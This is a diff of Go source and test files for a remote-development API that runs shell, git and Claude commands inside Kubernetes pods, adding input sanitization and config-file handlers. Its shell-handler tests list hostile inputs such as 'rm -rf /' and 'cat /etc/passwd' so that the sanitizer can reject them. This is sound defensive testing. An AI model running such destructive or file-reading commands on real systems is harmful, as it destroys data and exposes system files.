t.Skip("kubectl not available")
}
e := New("default")
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
// CheckConnection will succeed if kubectl is configured, fail otherwise
// We just verify it doesn't panic
_ = e.CheckConnection(ctx)
}
func TestExecutor_PodExists(t *testing.T) {
// Skip if kubectl is not available
if _, err := exec.LookPath("kubectl"); err != nil {
t.Skip("kubectl not available")
}
e := New("default")
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
// Check for a pod that definitely doesn't exist
exists, err := e.PodExists(ctx, "definitely-nonexistent-pod-12345")
// Should return false without error (or skip if cluster not available)
if err != nil {
t.Skipf("cluster not available: %v", err)
}
if exists {
t.Error("Expected pod to not exist")
}
}
// TestStreamOutput tests the streamOutput function behavior
func TestStreamOutput(t *testing.T) {
tests := []struct {
name string
input string
want []string
}{
{
name: "single line",
input: "hello world",
want: []string{"hello world"},
},
{
name: "multiple lines",
input: "line1\nline2\nline3",
want: []string{"line1", "line2", "line3"},
},
{
name: "empty input",
input: "",
want: nil,
},
{
name: "trailing newline",
input: "hello\n",
want: []string{"hello"},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var got []string
handler := func(stream, line string) {
if stream != "stdout" {
t.Errorf("stream = %q, want %q", stream, "stdout")
}
got = append(got, line)
}
r := strings.NewReader(tt.input)
streamOutput(r, "stdout", handler)
if len(got) != len(tt.want) {
t.Errorf("got %d lines, want %d", len(got), len(tt.want))
return
}
for i, line := range got {
if line != tt.want[i] {
t.Errorf("line[%d] = %q, want %q", i, line, tt.want[i])
}
}
})
}
}
// TestResult verifies Result struct behavior
func TestResult(t *testing.T) {
t.Run("successful result", func(t *testing.T) {
r := Result{
ExitCode: 0,
DurationMs: 1500,
Error: nil,
}
if r.ExitCode != 0 {
t.Errorf("ExitCode = %d, want 0", r.ExitCode)
}
if r.DurationMs != 1500 {
t.Errorf("DurationMs = %d, want 1500", r.DurationMs)
}
if r.Error != nil {
t.Errorf("Error = %v, want nil", r.Error)
}
})
t.Run("failed result", func(t *testing.T) {
r := Result{
ExitCode: 1,
DurationMs: 500,
Error: nil,
}
if r.ExitCode != 1 {
t.Errorf("ExitCode = %d, want 1", r.ExitCode)
}
})
}
// TestCommand verifies Command struct
func TestCommand(t *testing.T) {
now := time.Now()
cmd := Command{
ID: "cmd-123",
PodName: "test-pod",
Type: CommandTypeClaude,
Args: []string{"prompt here"},
StartedAt: now,
}
if cmd.ID != "cmd-123" {
t.Errorf("ID = %q, want %q", cmd.ID, "cmd-123")
}
if cmd.PodName != "test-pod" {
t.Errorf("PodName = %q, want %q", cmd.PodName, "test-pod")
}
if cmd.Type != CommandTypeClaude {
t.Errorf("Type = %q, want %q", cmd.Type, CommandTypeClaude)
}
if len(cmd.Args) != 1 || cmd.Args[0] != "prompt here" {
t.Errorf("Args = %v, want [\"prompt here\"]", cmd.Args)
}
if !cmd.StartedAt.Equal(now) {
t.Errorf("StartedAt = %v, want %v", cmd.StartedAt, now)
}
}

View File

@ -0,0 +1,436 @@
// Package handlers provides HTTP handlers for the rdev API.
package handlers
import (
"encoding/base64"
"encoding/json"
"fmt"
"net/http"
"regexp"
"strings"
"github.com/go-chi/chi/v5"
"github.com/orchard9/rdev/internal/executor"
"github.com/orchard9/rdev/internal/projects"
"github.com/orchard9/rdev/pkg/api"
)
// Package-level compiled regex for name validation (performance optimization).
var validNameRegex = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
// maxContentSize limits the size of content that can be written (1MB).
const maxContentSize = 1 << 20
// ClaudeConfigHandler handles Claude config management endpoints.
// Commands, skills, and agents live in /workspace/.claude/ (per-project, in git).
// Credentials live in /root/.claude/ (shared PVC).
type ClaudeConfigHandler struct {
registry *projects.Registry
executor *executor.Executor
}
// NewClaudeConfigHandler creates a new claude config handler.
func NewClaudeConfigHandler(registry *projects.Registry, exec *executor.Executor) *ClaudeConfigHandler {
return &ClaudeConfigHandler{
registry: registry,
executor: exec,
}
}
// Mount registers the claude-config routes.
func (h *ClaudeConfigHandler) Mount(r api.Router) {
r.Route("/projects/{id}/claude-config", func(r chi.Router) {
// Overview
r.Get("/", h.Overview)
// Commands
r.Get("/commands", h.ListCommands)
r.Post("/commands", h.CreateCommand)
r.Get("/commands/{name}", h.GetCommand)
r.Put("/commands/{name}", h.UpdateCommand)
r.Delete("/commands/{name}", h.DeleteCommand)
// Skills
r.Get("/skills", h.ListSkills)
r.Post("/skills", h.CreateSkill)
r.Get("/skills/{name}", h.GetSkill)
r.Put("/skills/{name}", h.UpdateSkill)
r.Delete("/skills/{name}", h.DeleteSkill)
// Agents
r.Get("/agents", h.ListAgents)
r.Post("/agents", h.CreateAgent)
r.Get("/agents/{name}", h.GetAgent)
r.Put("/agents/{name}", h.UpdateAgent)
r.Delete("/agents/{name}", h.DeleteAgent)
})
}
// ConfigOverview is the response for GET /projects/{id}/claude-config
type ConfigOverview struct {
Project string `json:"project"`
Path string `json:"path"`
Commands []string `json:"commands"`
Skills []string `json:"skills"`
Agents []string `json:"agents"`
}
// Overview returns an overview of the project's Claude config.
// GET /projects/{id}/claude-config
func (h *ClaudeConfigHandler) Overview(w http.ResponseWriter, r *http.Request) {
id := chi.URLParam(r, "id")
project, ok := h.registry.Get(id)
if !ok {
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
return
}
overview := ConfigOverview{
Project: id,
Path: "/workspace/.claude",
Commands: h.listItems(project.PodName, "commands"),
Skills: h.listItems(project.PodName, "skills"),
Agents: h.listItems(project.PodName, "agents"),
}
api.WriteSuccess(w, r, overview)
}
// ConfigItem represents a command, skill, or agent.
type ConfigItem struct {
Name string `json:"name"`
Type string `json:"type"`
Content string `json:"content"`
}
// ConfigItemRequest is the request body for creating/updating items.
type ConfigItemRequest struct {
Name string `json:"name,omitempty"` // Optional for POST (can be in URL)
Content string `json:"content"`
}
// --- Commands ---
// ListCommands returns all commands for a project.
// GET /projects/{id}/claude-config/commands
func (h *ClaudeConfigHandler) ListCommands(w http.ResponseWriter, r *http.Request) {
h.listType(w, r, "commands")
}
// CreateCommand creates a new command.
// POST /projects/{id}/claude-config/commands
func (h *ClaudeConfigHandler) CreateCommand(w http.ResponseWriter, r *http.Request) {
h.createItem(w, r, "commands")
}
// GetCommand returns a specific command.
// GET /projects/{id}/claude-config/commands/{name}
func (h *ClaudeConfigHandler) GetCommand(w http.ResponseWriter, r *http.Request) {
h.getItem(w, r, "commands")
}
// UpdateCommand updates a command.
// PUT /projects/{id}/claude-config/commands/{name}
func (h *ClaudeConfigHandler) UpdateCommand(w http.ResponseWriter, r *http.Request) {
h.updateItem(w, r, "commands")
}
// DeleteCommand deletes a command.
// DELETE /projects/{id}/claude-config/commands/{name}
func (h *ClaudeConfigHandler) DeleteCommand(w http.ResponseWriter, r *http.Request) {
h.deleteItem(w, r, "commands")
}
// --- Skills ---
// ListSkills returns all skills for a project.
// GET /projects/{id}/claude-config/skills
func (h *ClaudeConfigHandler) ListSkills(w http.ResponseWriter, r *http.Request) {
h.listType(w, r, "skills")
}
// CreateSkill creates a new skill.
// POST /projects/{id}/claude-config/skills
func (h *ClaudeConfigHandler) CreateSkill(w http.ResponseWriter, r *http.Request) {
h.createItem(w, r, "skills")
}
// GetSkill returns a specific skill.
// GET /projects/{id}/claude-config/skills/{name}
func (h *ClaudeConfigHandler) GetSkill(w http.ResponseWriter, r *http.Request) {
h.getItem(w, r, "skills")
}
// UpdateSkill updates a skill.
// PUT /projects/{id}/claude-config/skills/{name}
func (h *ClaudeConfigHandler) UpdateSkill(w http.ResponseWriter, r *http.Request) {
h.updateItem(w, r, "skills")
}
// DeleteSkill deletes a skill.
// DELETE /projects/{id}/claude-config/skills/{name}
func (h *ClaudeConfigHandler) DeleteSkill(w http.ResponseWriter, r *http.Request) {
h.deleteItem(w, r, "skills")
}
// --- Agents ---
// ListAgents returns all agents for a project.
// GET /projects/{id}/claude-config/agents
func (h *ClaudeConfigHandler) ListAgents(w http.ResponseWriter, r *http.Request) {
h.listType(w, r, "agents")
}
// CreateAgent creates a new agent.
// POST /projects/{id}/claude-config/agents
func (h *ClaudeConfigHandler) CreateAgent(w http.ResponseWriter, r *http.Request) {
h.createItem(w, r, "agents")
}
// GetAgent returns a specific agent.
// GET /projects/{id}/claude-config/agents/{name}
func (h *ClaudeConfigHandler) GetAgent(w http.ResponseWriter, r *http.Request) {
h.getItem(w, r, "agents")
}
// UpdateAgent updates an agent.
// PUT /projects/{id}/claude-config/agents/{name}
func (h *ClaudeConfigHandler) UpdateAgent(w http.ResponseWriter, r *http.Request) {
h.updateItem(w, r, "agents")
}
// DeleteAgent deletes an agent.
// DELETE /projects/{id}/claude-config/agents/{name}
func (h *ClaudeConfigHandler) DeleteAgent(w http.ResponseWriter, r *http.Request) {
h.deleteItem(w, r, "agents")
}
// --- Helper methods ---
// listItems returns the names of items in a directory.
func (h *ClaudeConfigHandler) listItems(pod, itemType string) []string {
cmd := fmt.Sprintf("ls -1 /workspace/.claude/%s 2>/dev/null | sed 's/\\.md$//'", itemType)
output, err := h.executor.ExecSimple(pod, cmd)
if err != nil {
return []string{}
}
items := []string{}
for _, line := range strings.Split(strings.TrimSpace(output), "\n") {
if line != "" {
items = append(items, line)
}
}
return items
}
// listType handles GET /projects/{id}/claude-config/{type}
func (h *ClaudeConfigHandler) listType(w http.ResponseWriter, r *http.Request, itemType string) {
id := chi.URLParam(r, "id")
project, ok := h.registry.Get(id)
if !ok {
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
return
}
items := h.listItems(project.PodName, itemType)
api.WriteSuccess(w, r, items)
}
// createItem handles POST /projects/{id}/claude-config/{type}
func (h *ClaudeConfigHandler) createItem(w http.ResponseWriter, r *http.Request, itemType string) {
id := chi.URLParam(r, "id")
project, ok := h.registry.Get(id)
if !ok {
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
return
}
// Limit request body size to prevent DoS
r.Body = http.MaxBytesReader(w, r.Body, maxContentSize)
var req ConfigItemRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
api.WriteBadRequest(w, r, "invalid request body or content too large")
return
}
if req.Name == "" {
api.WriteBadRequest(w, r, "name is required")
return
}
if req.Content == "" {
api.WriteBadRequest(w, r, "content is required")
return
}
// Validate name (alphanumeric, dashes, underscores only)
if !isValidName(req.Name) {
api.WriteBadRequest(w, r, "name must be alphanumeric with dashes or underscores")
return
}
// Ensure directory exists
dirCmd := fmt.Sprintf("mkdir -p /workspace/.claude/%s", itemType)
if _, err := h.executor.ExecSimple(project.PodName, dirCmd); err != nil {
api.WriteInternalError(w, r, fmt.Sprintf("failed to create directory: %v", err))
return
}
// Write file using base64 encoding to prevent shell injection
// This avoids heredoc terminator injection attacks
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, req.Name)
encoded := base64.StdEncoding.EncodeToString([]byte(req.Content))
writeCmd := fmt.Sprintf("echo '%s' | base64 -d > %s", encoded, filePath)
if _, err := h.executor.ExecSimple(project.PodName, writeCmd); err != nil {
api.WriteInternalError(w, r, fmt.Sprintf("failed to write file: %v", err))
return
}
item := ConfigItem{
Name: req.Name,
Type: itemType,
Content: req.Content,
}
api.WriteJSON(w, r, http.StatusCreated, item)
}
// getItem handles GET /projects/{id}/claude-config/{type}/{name}
func (h *ClaudeConfigHandler) getItem(w http.ResponseWriter, r *http.Request, itemType string) {
id := chi.URLParam(r, "id")
name := chi.URLParam(r, "name")
project, ok := h.registry.Get(id)
if !ok {
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
return
}
if !isValidName(name) {
api.WriteBadRequest(w, r, "invalid name")
return
}
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name)
cmd := fmt.Sprintf("cat %s 2>/dev/null", filePath)
output, err := h.executor.ExecSimple(project.PodName, cmd)
if err != nil || output == "" {
api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name))
return
}
item := ConfigItem{
Name: name,
Type: itemType,
Content: strings.TrimSpace(output),
}
api.WriteSuccess(w, r, item)
}
// updateItem handles PUT /projects/{id}/claude-config/{type}/{name}
func (h *ClaudeConfigHandler) updateItem(w http.ResponseWriter, r *http.Request, itemType string) {
id := chi.URLParam(r, "id")
name := chi.URLParam(r, "name")
project, ok := h.registry.Get(id)
if !ok {
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
return
}
if !isValidName(name) {
api.WriteBadRequest(w, r, "invalid name")
return
}
// Limit request body size to prevent DoS
r.Body = http.MaxBytesReader(w, r.Body, maxContentSize)
var req ConfigItemRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
api.WriteBadRequest(w, r, "invalid request body or content too large")
return
}
if req.Content == "" {
api.WriteBadRequest(w, r, "content is required")
return
}
// Check file exists
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name)
checkCmd := fmt.Sprintf("test -f %s && echo exists", filePath)
output, _ := h.executor.ExecSimple(project.PodName, checkCmd)
if strings.TrimSpace(output) != "exists" {
api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name))
return
}
// Write file using base64 encoding to prevent shell injection
encoded := base64.StdEncoding.EncodeToString([]byte(req.Content))
writeCmd := fmt.Sprintf("echo '%s' | base64 -d > %s", encoded, filePath)
if _, err := h.executor.ExecSimple(project.PodName, writeCmd); err != nil {
api.WriteInternalError(w, r, fmt.Sprintf("failed to write file: %v", err))
return
}
item := ConfigItem{
Name: name,
Type: itemType,
Content: req.Content,
}
api.WriteSuccess(w, r, item)
}
// deleteItem handles DELETE /projects/{id}/claude-config/{type}/{name}
func (h *ClaudeConfigHandler) deleteItem(w http.ResponseWriter, r *http.Request, itemType string) {
id := chi.URLParam(r, "id")
name := chi.URLParam(r, "name")
project, ok := h.registry.Get(id)
if !ok {
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
return
}
if !isValidName(name) {
api.WriteBadRequest(w, r, "invalid name")
return
}
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name)
// Check file exists
checkCmd := fmt.Sprintf("test -f %s && echo exists", filePath)
output, _ := h.executor.ExecSimple(project.PodName, checkCmd)
if strings.TrimSpace(output) != "exists" {
api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name))
return
}
// Delete file
deleteCmd := fmt.Sprintf("rm %s", filePath)
if _, err := h.executor.ExecSimple(project.PodName, deleteCmd); err != nil {
api.WriteInternalError(w, r, fmt.Sprintf("failed to delete file: %v", err))
return
}
api.WriteSuccess(w, r, map[string]string{"deleted": name})
}
// isValidName checks if a name is safe for use in file paths.
func isValidName(name string) bool {
if name == "" || len(name) > 64 {
return false
}
// Only allow alphanumeric, dashes, and underscores
// Uses package-level compiled regex for performance
return validNameRegex.MatchString(name)
}

View File

@ -0,0 +1,345 @@
package handlers
import (
"bytes"
"context"
"encoding/json"
"net/http"
"net/http/httptest"
"strings"
"testing"
"time"
"github.com/go-chi/chi/v5"
"github.com/orchard9/rdev/internal/auth"
"github.com/orchard9/rdev/internal/testutil"
)
// TestKeysHandler requires a database connection.
// Tests are skipped if the database is not available.
func setupKeysHandler(t *testing.T) (*KeysHandler, chi.Router, *auth.Service) {
db := testutil.TestDB(t)
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
authService := auth.NewService(db, "test-admin-key")
handler := NewKeysHandler(authService)
router := chi.NewRouter()
// For tests, we'll mount without the auth middleware
// since we're testing the handler logic, not auth
router.Route("/keys", func(r chi.Router) {
r.Get("/", handler.List)
r.Post("/", handler.Create)
r.Get("/{id}", handler.Get)
r.Delete("/{id}", handler.Revoke)
})
return handler, router, authService
}
func TestKeysHandler_List(t *testing.T) {
_, router, authService := setupKeysHandler(t)
// Create some test keys
for i := 0; i < 3; i++ {
_, err := authService.Create(context.Background(), auth.CreateKeyRequest{
Name: "test-handler-list-" + string(rune('a'+i)),
Scopes: []auth.Scope{auth.ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Failed to create test key: %v", err)
}
}
req := httptest.NewRequest("GET", "/keys", nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusOK {
t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String())
}
var resp map[string]any
if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
t.Fatalf("Failed to decode response: %v", err)
}
data, ok := resp["data"].([]any)
if !ok {
t.Fatal("Response data is not an array")
}
// Should have at least 3 keys
if len(data) < 3 {
t.Errorf("Expected at least 3 keys, got %d", len(data))
}
}
func TestKeysHandler_Create(t *testing.T) {
_, router, _ := setupKeysHandler(t)
tests := []struct {
name string
body CreateKeyRequest
wantStatus int
wantErr string
}{
{
name: "valid key",
body: CreateKeyRequest{
Name: "test-create-key",
Scopes: []string{"projects:read"},
ExpiresIn: "30d",
},
wantStatus: http.StatusCreated,
},
{
name: "missing name",
body: CreateKeyRequest{
Scopes: []string{"projects:read"},
},
wantStatus: http.StatusBadRequest,
wantErr: "name is required",
},
{
name: "missing scopes",
body: CreateKeyRequest{
Name: "test-no-scopes",
},
wantStatus: http.StatusBadRequest,
wantErr: "scopes is required",
},
{
name: "invalid scope",
body: CreateKeyRequest{
Name: "test-invalid-scope",
Scopes: []string{"invalid:scope"},
},
wantStatus: http.StatusBadRequest,
wantErr: "invalid scope",
},
{
name: "invalid expiration",
body: CreateKeyRequest{
Name: "test-invalid-exp",
Scopes: []string{"projects:read"},
ExpiresIn: "invalid",
},
wantStatus: http.StatusBadRequest,
wantErr: "expiration",
},
{
name: "with project restrictions",
body: CreateKeyRequest{
Name: "test-with-projects",
Scopes: []string{"projects:read"},
ProjectIDs: []string{"proj-a", "proj-b"},
ExpiresIn: "90d",
},
wantStatus: http.StatusCreated,
},
{
name: "never expires",
body: CreateKeyRequest{
Name: "test-never-expires",
Scopes: []string{"admin"},
ExpiresIn: "never",
},
wantStatus: http.StatusCreated,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
body, _ := json.Marshal(tt.body)
req := httptest.NewRequest("POST", "/keys", bytes.NewReader(body))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != tt.wantStatus {
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
}
if tt.wantErr != "" {
if !strings.Contains(rec.Body.String(), tt.wantErr) {
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
}
}
// For successful creates, verify the response structure
if tt.wantStatus == http.StatusCreated {
var resp map[string]any
json.NewDecoder(bytes.NewReader(rec.Body.Bytes())).Decode(&resp)
data, _ := resp["data"].(map[string]any)
if data["secret"] == nil || data["secret"] == "" {
t.Error("Response should include secret")
}
if data["key"] == nil {
t.Error("Response should include key object")
}
}
})
}
}
func TestKeysHandler_Get(t *testing.T) {
_, router, authService := setupKeysHandler(t)
// Create a key to get
result, err := authService.Create(context.Background(), auth.CreateKeyRequest{
Name: "test-handler-get",
Scopes: []auth.Scope{auth.ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Failed to create test key: %v", err)
}
t.Run("existing key", func(t *testing.T) {
req := httptest.NewRequest("GET", "/keys/"+result.Key.ID, nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusOK {
t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String())
}
var resp map[string]any
json.NewDecoder(rec.Body).Decode(&resp)
data, _ := resp["data"].(map[string]any)
if data["name"] != "test-handler-get" {
t.Errorf("Name = %v, want test-handler-get", data["name"])
}
})
t.Run("non-existent key", func(t *testing.T) {
req := httptest.NewRequest("GET", "/keys/00000000-0000-0000-0000-000000000000", nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusNotFound {
t.Errorf("Status = %d, want 404", rec.Code)
}
})
}
func TestKeysHandler_Revoke(t *testing.T) {
_, router, authService := setupKeysHandler(t)
// Create a key to revoke
result, err := authService.Create(context.Background(), auth.CreateKeyRequest{
Name: "test-handler-revoke",
Scopes: []auth.Scope{auth.ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Failed to create test key: %v", err)
}
t.Run("revoke existing key", func(t *testing.T) {
req := httptest.NewRequest("DELETE", "/keys/"+result.Key.ID, nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusOK {
t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String())
}
var resp map[string]any
json.NewDecoder(rec.Body).Decode(&resp)
data, _ := resp["data"].(map[string]any)
if data["status"] != "revoked" {
t.Errorf("Status = %v, want revoked", data["status"])
}
// Verify the key is actually revoked
_, err := authService.Validate(context.Background(), result.Secret)
if err != auth.ErrKeyRevoked {
t.Errorf("Key should be revoked, got err = %v", err)
}
})
t.Run("revoke non-existent key", func(t *testing.T) {
req := httptest.NewRequest("DELETE", "/keys/00000000-0000-0000-0000-000000000000", nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusNotFound {
t.Errorf("Status = %d, want 404", rec.Code)
}
})
}
func TestKeysHandler_InvalidJSON(t *testing.T) {
_, router, _ := setupKeysHandler(t)
req := httptest.NewRequest("POST", "/keys", strings.NewReader("invalid json{"))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusBadRequest {
t.Errorf("Status = %d, want 400", rec.Code)
}
if !strings.Contains(rec.Body.String(), "Invalid JSON") {
t.Errorf("Body = %q, want to contain 'Invalid JSON'", rec.Body.String())
}
}
func TestApiKeyToResponse(t *testing.T) {
now := time.Now()
future := now.Add(24 * time.Hour)
key := &auth.APIKey{
ID: "test-id",
Name: "test-name",
KeyPrefix: "rdev_sk_abc",
Scopes: []auth.Scope{auth.ScopeProjectsRead, auth.ScopeProjectsExecute},
ProjectIDs: []string{"proj-a"},
CreatedAt: now,
ExpiresAt: &future,
LastUsedAt: &now,
CreatedBy: "test-user",
}
resp := apiKeyToResponse(key)
if resp.ID != "test-id" {
t.Errorf("ID = %q, want test-id", resp.ID)
}
if resp.Name != "test-name" {
t.Errorf("Name = %q, want test-name", resp.Name)
}
if len(resp.Scopes) != 2 {
t.Errorf("Scopes length = %d, want 2", len(resp.Scopes))
}
if len(resp.ProjectIDs) != 1 {
t.Errorf("ProjectIDs length = %d, want 1", len(resp.ProjectIDs))
}
if resp.ExpiresAt == nil {
t.Error("ExpiresAt should not be nil")
}
if resp.LastUsedAt == nil {
t.Error("LastUsedAt should not be nil")
}
if !resp.Active {
t.Error("Active should be true")
}
}

View File

@ -13,6 +13,7 @@ import (
"github.com/go-chi/chi/v5"
"github.com/orchard9/rdev/internal/executor"
"github.com/orchard9/rdev/internal/projects"
"github.com/orchard9/rdev/internal/sanitize"
"github.com/orchard9/rdev/pkg/api"
)
@ -104,6 +105,18 @@ func (h *ProjectsHandler) RunClaude(w http.ResponseWriter, r *http.Request) {
return
}
// Sanitize prompt
if err := sanitize.ClaudePrompt(req.Prompt); err != nil {
api.WriteBadRequest(w, r, err.Error())
return
}
// Validate stream ID
if err := sanitize.StreamID(req.StreamID); err != nil {
api.WriteBadRequest(w, r, err.Error())
return
}
// Generate command ID
cmdNum := h.cmdID.Add(1)
cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum)
@ -162,6 +175,18 @@ func (h *ProjectsHandler) RunShell(w http.ResponseWriter, r *http.Request) {
return
}
// Sanitize command - CRITICAL for security
if err := sanitize.ShellCommand(req.Command); err != nil {
api.WriteBadRequest(w, r, err.Error())
return
}
// Validate stream ID
if err := sanitize.StreamID(req.StreamID); err != nil {
api.WriteBadRequest(w, r, err.Error())
return
}
// Generate command ID
cmdNum := h.cmdID.Add(1)
cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum)
@ -220,6 +245,18 @@ func (h *ProjectsHandler) RunGit(w http.ResponseWriter, r *http.Request) {
return
}
// Sanitize git args
if err := sanitize.GitArgs(req.Args); err != nil {
api.WriteBadRequest(w, r, err.Error())
return
}
// Validate stream ID
if err := sanitize.StreamID(req.StreamID); err != nil {
api.WriteBadRequest(w, r, err.Error())
return
}
// Generate command ID
cmdNum := h.cmdID.Add(1)
cmdID := fmt.Sprintf("cmd-%s-%03d", id, cmdNum)
@ -403,3 +440,13 @@ func (sm *streamManager) Close(streamID string) {
}
delete(sm.streams, streamID)
}
// Registry returns the project registry for use by other handlers.
func (h *ProjectsHandler) Registry() *projects.Registry {
return h.registry
}
// Executor returns the executor for use by other handlers.
func (h *ProjectsHandler) Executor() *executor.Executor {
return h.executor
}

View File

@ -0,0 +1,464 @@
package handlers
import (
"bytes"
"encoding/json"
"net/http"
"net/http/httptest"
"strings"
"testing"
"github.com/go-chi/chi/v5"
)
// TestProjectsHandler_List tests the List endpoint.
func TestProjectsHandler_List(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
req := httptest.NewRequest("GET", "/projects", nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusOK {
t.Errorf("Status = %d, want 200", rec.Code)
}
var resp map[string]any
if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
t.Fatalf("Failed to decode response: %v", err)
}
if _, ok := resp["data"]; !ok {
t.Error("Response missing 'data' field")
}
if _, ok := resp["meta"]; !ok {
t.Error("Response missing 'meta' field")
}
}
// TestProjectsHandler_Get tests the Get endpoint.
func TestProjectsHandler_Get(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
tests := []struct {
name string
projectID string
wantStatus int
}{
{"existing project", "pantheon", http.StatusOK},
{"non-existent project", "nonexistent", http.StatusNotFound},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
req := httptest.NewRequest("GET", "/projects/"+tt.projectID, nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != tt.wantStatus {
t.Errorf("Status = %d, want %d", rec.Code, tt.wantStatus)
}
})
}
}
// TestProjectsHandler_RunClaude tests the RunClaude endpoint.
func TestProjectsHandler_RunClaude(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
tests := []struct {
name string
projectID string
body any
wantStatus int
wantErr string
}{
{
name: "valid request",
projectID: "pantheon",
body: ClaudeRequest{
Prompt: "Hello, world!",
},
wantStatus: http.StatusCreated,
},
{
name: "missing prompt",
projectID: "pantheon",
body: ClaudeRequest{
Prompt: "",
},
wantStatus: http.StatusBadRequest,
wantErr: "prompt is required",
},
{
name: "project not found",
projectID: "nonexistent",
body: ClaudeRequest{Prompt: "test"},
wantStatus: http.StatusNotFound,
},
{
name: "null byte in prompt",
projectID: "pantheon",
body: ClaudeRequest{
Prompt: "Hello\x00World",
},
wantStatus: http.StatusBadRequest,
wantErr: "null byte",
},
{
name: "invalid stream ID",
projectID: "pantheon",
body: ClaudeRequest{
Prompt: "Hello",
StreamID: "invalid stream id with spaces",
},
wantStatus: http.StatusBadRequest,
wantErr: "alphanumeric",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
body, _ := json.Marshal(tt.body)
req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/claude", bytes.NewReader(body))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != tt.wantStatus {
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
}
if tt.wantErr != "" {
if !strings.Contains(rec.Body.String(), tt.wantErr) {
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
}
}
})
}
}
// TestProjectsHandler_RunShell tests the RunShell endpoint.
func TestProjectsHandler_RunShell(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
tests := []struct {
name string
projectID string
body any
wantStatus int
wantErr string
}{
{
name: "valid command",
projectID: "pantheon",
body: ShellRequest{
Command: "ls -la",
},
wantStatus: http.StatusCreated,
},
{
name: "missing command",
projectID: "pantheon",
body: ShellRequest{
Command: "",
},
wantStatus: http.StatusBadRequest,
wantErr: "command is required",
},
{
name: "dangerous command with semicolon",
projectID: "pantheon",
body: ShellRequest{
Command: "ls; rm -rf /",
},
wantStatus: http.StatusBadRequest,
wantErr: "command chaining",
},
{
name: "dangerous command with pipe",
projectID: "pantheon",
body: ShellRequest{
Command: "cat /etc/passwd | grep root",
},
wantStatus: http.StatusBadRequest,
wantErr: "command chaining",
},
{
name: "command substitution",
projectID: "pantheon",
body: ShellRequest{
Command: "echo $(whoami)",
},
wantStatus: http.StatusBadRequest,
wantErr: "command chaining",
},
{
name: "redirect",
projectID: "pantheon",
body: ShellRequest{
Command: "ls > /tmp/out.txt",
},
wantStatus: http.StatusBadRequest,
wantErr: "redirect",
},
{
name: "rm rf root",
projectID: "pantheon",
body: ShellRequest{
Command: "rm -rf /",
},
wantStatus: http.StatusBadRequest,
wantErr: "destructive rm",
},
{
name: "project not found",
projectID: "nonexistent",
body: ShellRequest{Command: "ls"},
wantStatus: http.StatusNotFound,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
body, _ := json.Marshal(tt.body)
req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/shell", bytes.NewReader(body))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != tt.wantStatus {
